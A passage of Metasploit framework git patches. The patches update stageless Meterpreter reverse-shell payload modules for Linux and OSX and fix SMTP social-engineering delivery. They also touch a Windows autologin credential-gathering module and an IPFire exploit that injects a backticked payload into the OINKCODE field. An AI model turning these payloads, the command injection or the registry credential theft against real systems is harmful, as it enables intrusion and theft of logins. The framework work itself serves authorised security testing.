MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index bf40874804..f468ddbada 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index dd52bbdcb1..50d9bf8fd4 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index c77c364f8e..c061ad7603 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 7484609efa..af9d102c50 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 0c9523f14b..e458dea19c 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 4ccc63a1b8..c4909660cd 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 80f1085036..e713c3d24b 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 884f95a9e4..13eb0ba7af 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 5d26e63a25..a09a19a99c 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index 84c45966ce..157791c38f 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index 251f57fa6a..b6e36369ca 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 92af2311c4..c9a316920d 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 1e7f8aa3b7..ffb57406a2 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 18f404a247..1b8616e199 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index c0f52dbf15..0a39b3bc0b 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index e25a8a17f4..a570d615ae 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 3b829a34ea..37ceede91f 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 0aaaa207df..829b48db4f 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 467fc900fb..9117fdcca9 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index c00ef067ae..c5fa02fd76 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 22b5d30a1b..97c4075640 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 8da93cb5f7..423e829dd3 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb similarity index 61% rename from modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb rename to modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index 756e3f5e73..0bb2dace76 100644 --- a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -3,13 +3,15 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core/handler/reverse_tcp' +require 'msf/core/handler/reverse_http' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_x86_osx' +require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule + CachedSize = 618316 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig @@ -18,23 +20,26 @@ module MetasploitModule super( update_info( info, - 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Name' => 'OSX Meterpreter, Reverse HTTP Inline', 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', 'Brent Cook ' ], 'Platform' => 'osx', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X64, 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_x86_OSX + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX ) ) end def generate - opts = {scheme: 'tcp'} - MetasploitPayloads::Mettle.new('i386-apple-darwin', generate_config(opts)).to_binary :exec + opts = { + scheme: 'http', + stageless: true + } + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..2f08049976 --- /dev/null +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -0,0 +1,45 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_osx' + +module MetasploitModule + + CachedSize = 618316 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX + ) + ) + end + + def generate + opts = { + scheme: 'https', + stageless: true + } + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index dbb741e67c..43070ef0ae 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule + CachedSize = 618316 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig @@ -34,7 +36,10 @@ module MetasploitModule end def generate - opts = {scheme: 'tcp'} + opts = { + scheme: 'tcp', + stageless: true + } MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec end end diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb index 91d8bbb520..967a051b81 100755 --- a/tools/modules/generate_mettle_payloads.rb +++ b/tools/modules/generate_mettle_payloads.rb @@ -12,32 +12,36 @@ schemes = [ ] arches = [ - ['aarch64', 'aarch64-linux-musl'], - ['armbe', 'armv5b-linux-musleabi'], - ['armle', 'armv5l-linux-musleabi'], - ['mips64', 'mips64-linux-muslsf'], - ['mipsbe', 'mips-linux-muslsf'], - ['mipsle', 'mipsel-linux-muslsf'], - ['ppc', 'powerpc-linux-muslsf'], - ['ppc64le', 'powerpc64le-linux-musl'], - ['x64', 'x86_64-linux-musl'], - ['x86', 'i486-linux-musl'], - ['zarch', 's390x-linux-musl'], + ['aarch64','Linux', 'aarch64-linux-musl'], + ['armbe', 'Linux', 'armv5b-linux-musleabi'], + ['armle', 'Linux', 'armv5l-linux-musleabi'], + ['mips64', 'Linux', 'mips64-linux-muslsf'], + ['mipsbe', 'Linux', 'mips-linux-muslsf'], + ['mipsle', 'Linux', 'mipsel-linux-muslsf'], + ['ppc', 'Linux', 'powerpc-linux-muslsf'], + ['ppc64le','Linux', 'powerpc64le-linux-musl'], + ['x64', 'Linux', 'x86_64-linux-musl'], + ['x86', 'Linux', 'i486-linux-musl'], + ['zarch', 'Linux', 's390x-linux-musl'], + ['x64', 'OSX', 'x86_64-apple-darwin'], ] arch = '' payload = '' +platform = '' scheme = '' cwd = File::dirname(__FILE__) -template = File::read(File::join(cwd, 'linux_meterpreter_reverse.erb')) -renderer = ERB.new(template) -arches.each do |a, p| +arches.each do |a, pl, pa| schemes.each do |s| arch = a - payload = p + platform = pl + payload = pa scheme = s - filename = File::join('modules', 'payloads', 'singles', 'linux', arch, "meterpreter_reverse_#{scheme}.rb") + + template = File::read(File::join(cwd, "meterpreter_reverse.erb")) + renderer = ERB.new(template) + filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb") File::write(filename, renderer.result()) end end diff --git a/tools/modules/linux_meterpreter_reverse.erb b/tools/modules/meterpreter_reverse.erb similarity index 72% rename from tools/modules/linux_meterpreter_reverse.erb rename to tools/modules/meterpreter_reverse.erb index bffd3a8edb..6ff39341d0 100644 --- a/tools/modules/linux_meterpreter_reverse.erb +++ b/tools/modules/meterpreter_reverse.erb @@ -6,7 +6,7 @@ require 'msf/core/handler/reverse_<%= scheme %>' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_<%= arch %>_linux' +require 'msf/base/sessions/meterpreter_<%= arch %>_<%= platform.downcase %>' module MetasploitModule @@ -18,23 +18,27 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse <%= scheme.upcase %> Inline', + 'Name' => '<%= platform %> Meterpreter, Reverse <%= scheme.upcase %> Inline', 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], - 'Platform' => 'linux', + 'Platform' => '<%= platform.downcase %>', 'Arch' => ARCH_<%= arch.upcase %>, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::Reverse<%= scheme.capitalize %>, - 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_Linux + 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_<%= platform %> ) ) end def generate - opts = {scheme: '<%= scheme %>'} + opts = { + scheme: '<%= scheme %>', + stageless: true + } MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec end end From 638559314890c566191814015d92e659de485a95 Mon Sep 17 00:00:00 2001 From: Jin Qian Date: Tue, 18 Jul 2017 14:30:44 -0500 Subject: [PATCH 43/63] Fix SE campaign exception. MS-2705, SE_campaign will crash when RCPT command got socket closure as a response. Thanks to Pearce for the triage. --- lib/msf/core/exploit/smtp_deliver.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) mode change 100644 => 100755 lib/msf/core/exploit/smtp_deliver.rb diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb old mode 100644 new mode 100755 index 32460885dd..b17d67270c --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock) res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock) - if res[0..2] == '250' + if res && res[0..2] == '250' resp = raw_send_recv("DATA\r\n", nsock) # If the user supplied a Date field, use that, else use the current @@ -242,10 +242,12 @@ module Exploit::Remote::SMTPDeliver # to dump it all. vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end - - nsock.put(cmd) - res = nsock.get_once - + begin + nsock.put(cmd) + res = nsock.get_once + rescue + return nil + end # Don't truncate the server output because it might be helpful for # debugging. vprint_status("S: #{res.strip}") if res From 45f81f3c98ba8779a327c19aabe88a2344186224 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Tue, 18 Jul 2017 12:45:02 -0700 Subject: [PATCH 44/63] Squash some style issues --- modules/auxiliary/scanner/rdp/rdp_scanner.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/rdp_scanner.rb b/modules/auxiliary/scanner/rdp/rdp_scanner.rb index 50c4cb8c01..d38c87dc14 100644 --- a/modules/auxiliary/scanner/rdp/rdp_scanner.rb +++ b/modules/auxiliary/scanner/rdp/rdp_scanner.rb @@ -57,18 +57,18 @@ class MetasploitModule < Msf::Auxiliary def setup # build a simple TPKT v3 + x.224 COTP Connect Request. optionally append # RDP negotiation request with TLS, CredSSP and Early User as requesteste - requestedProtocols = 0 + requested_protocols = 0 if datastore['TLS'] - requestedProtocols = requestedProtocols ^ 0b1 + requested_protocols = requested_protocols ^ 0b1 end if datastore['CredSSP'] - requestedProtocols = requestedProtocols ^ 0b10 + requested_protocols = requested_protocols ^ 0b10 end if datastore['EarlyUser'] - requestedProtocols = requestedProtocols ^ 0b1000 + requested_protocols = requested_protocols ^ 0b1000 end - if requestedProtocols == 0 + if requested_protocols == 0 tpkt_len = 11 cotp_len = 6 pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0 ] @@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary else tpkt_len = 19 cotp_len = 14 - pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0, 1, 0, 8, 0, requestedProtocols ] + pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0, 1, 0, 8, 0, requested_protocols ] pack_string = "CCnCCnnCCCCCV" end @probe = pack.pack(pack_string) @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary disconnect end - service = report_service( + report_service( host: rhost, port: rport, proto: 'tcp', From 0d3f5ae22085ec23f3ec4a45b3349ab444f2a050 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 18 Jul 2017 22:50:34 +0200 Subject: [PATCH 45/63] cleanup windows_autologin --- .../gather/credentials/windows_autologin.rb | 22 +++++-------------- 1 file changed, 6 insertions(+), 16 deletions(-) diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 0cf6f1170f..2ef17660bf 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -45,8 +45,6 @@ class MetasploitModule < Msf::Post has_al = 0 - # DefaultDomainName, DefaultUserName, DefaultPassword - # AltDefaultDomainName, AltDefaultUserName, AltDefaultPassword logon_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\" al = registry_getvaldata(logon_key, "AutoAdminLogon") || '' @@ -58,24 +56,16 @@ class MetasploitModule < Msf::Post du2 = registry_getvaldata(logon_key, "AltDefaultUserName") || '' dp2 = registry_getvaldata(logon_key, "AltDefaultPassword") || '' - if do1 != '' and du1 != '' and dp1 == '' and al == '1' + if do1 != '' && du1 != '' && dp1 == '' has_al = 1 - creds << [du1,dp1, do1] - print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") - elsif do1 != '' and du1 != '' and dp1 != '' - has_al = 1 - creds << [du1,dp1, do1] - print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") + creds << [du1, dp1, do1] + print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") end - if do2 != '' and du2 != '' and dp2 == '' and al == '1' + if do2 != '' && du2 != '' && dp2 == '' has_al = 1 - creds << [du2,dp2,do2] - print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") - elsif do2 != '' and du2 != '' and dp2 != '' - has_al = 1 - creds << [du2,dp2,do2] - print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") + creds << [du2, dp2, do2] + print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") end if has_al == 0 From 0f31edfe39ae5d33775bcb7d7dcc0083453107ba Mon Sep 17 00:00:00 2001 From: Jin Qian Date: Tue, 18 Jul 2017 16:17:53 -0500 Subject: [PATCH 46/63] Change tab into space to be standard compliant Thanks to Brent and Dave for pointing it out. --- lib/msf/core/exploit/smtp_deliver.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index b17d67270c..36c03bca7c 100755 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -242,12 +242,12 @@ module Exploit::Remote::SMTPDeliver # to dump it all. vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end - begin - nsock.put(cmd) - res = nsock.get_once - rescue - return nil - end + begin + nsock.put(cmd) + res = nsock.get_once + rescue + return nil + end # Don't truncate the server output because it might be helpful for # debugging. vprint_status("S: #{res.strip}") if res From 116a838cb070d11af2e85e61f551ed7df5a82782 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 19 Jul 2017 13:26:40 -0500 Subject: [PATCH 47/63] Version check update and stylistic fix --- .../linux/http/ipfire_oinkcode_exec.rb | 27 ++++++++++--------- 1 file changed, 14 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index d4238b6c0b..8350d51a5d 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -67,18 +67,20 @@ class MetasploitModule < Msf::Exploit::Remote 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) - if res and res.code == 200 + if res && res.code == 200 /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body end - - # now that we've pulled the info we need, check version. - if version && update && version == '2.19' && update.to_i <= 110 + if version.nil? || update.nil? || !Gem::Version.correct?(version) + vprint_error('No Recognizable Version Found') + CheckCode::Safe + elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110 CheckCode::Appears else + vprint_error('Version and/or Update Not Supported') CheckCode::Safe end - rescue ::Rex::ConnectionError + print_error("Connection Failed") CheckCode::Safe end end @@ -97,20 +99,19 @@ class MetasploitModule < Msf::Exploit::Remote 'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" }, 'vars_post' => { - 'ENABLE_SNORT_GREEN' => 'on', - 'ENABLE_SNORT' => 'on', - 'RULES' => 'registered', - 'OINKCODE' => "`#{payload.encoded}`", - 'ACTION' => 'Download new ruleset', - 'ACTION2' => 'snort' + 'ENABLE_SNORT_GREEN' => 'on', + 'ENABLE_SNORT' => 'on', + 'RULES' => 'registered', + 'OINKCODE' => "`#{payload.encoded}`", + 'ACTION' => 'Download new ruleset', + 'ACTION2' => 'snort' } ) # success means we hang our session, and wont get back a response, so just check we get a response back - if res && res.code != 200 + if res && res.code != 200 fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") end - rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end From 22e8f1cb48a5bd3f1d0b319e62b3a24fba709af5 Mon Sep 17 00:00:00 2001 From: Corey Harding Date: Thu, 20 Jul 2017 05:09:00 -0400 Subject: [PATCH 48/63] HWBRIDGE RFTRANSCEIVER ADD LOWBALL SUPPORT --- .../post/hardware/rftransceiver/rftransceiver.rb | 10 ++++++++++ .../extensions/rftransceiver/rftransceiver.rb | 4 ++++ .../console/command_dispatcher/rftransceiver.rb | 15 +++++++++++++++ 3 files changed, 29 insertions(+) diff --git a/lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb b/lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb index 5ecb336ec3..7bc09175f9 100644 --- a/lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb +++ b/lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb @@ -278,6 +278,16 @@ module RFTransceiver return_success(r) end + # + # Sets lowball. Ensure you set the frequency first before using this + # @return [Boolean] success value + def set_lowball + return false unless is_rf? + self.index ||= 0 + r = client.rftransceiver.set_lowball(self.index) + return_success(r) + end + # # Set power level # @param level [Integer] Power level diff --git a/lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb b/lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb index 9ef945f8d8..eae14ba6fc 100644 --- a/lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb +++ 